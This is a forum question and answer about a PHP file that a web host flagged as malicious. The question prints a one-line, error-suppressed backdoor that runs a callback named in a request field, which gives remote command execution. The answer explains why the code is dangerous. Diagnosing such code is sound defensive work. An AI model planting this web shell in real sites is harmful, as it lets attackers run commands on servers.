# PHP Issue with array_diff_ukey

Tags: php

My web-hosting sent me a warning about one of my files claiming that file is a virus threat.
Can you please explain to me why this piece of code is wrong? 
Thank you

```
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); 
?>
```

Comment: Why do you need `@array()`? It may be wrong because you are passing raw password to some function that comes from user.

Comment: Honestly, I've inherited this project and that wasn't my decision to make it such as it is right now.

Answer (score 0, accepted):

The callback to use for the `array_diff()` can be specified by the user (`$_REQUEST['login']`), so whatever function they specify in the `login` field of the request (or in the URL) will be executed by this code. That makes it dangerous.

You're not even checking whether the values you get come from $_POST or $_GET, so you have no control over what gets passed in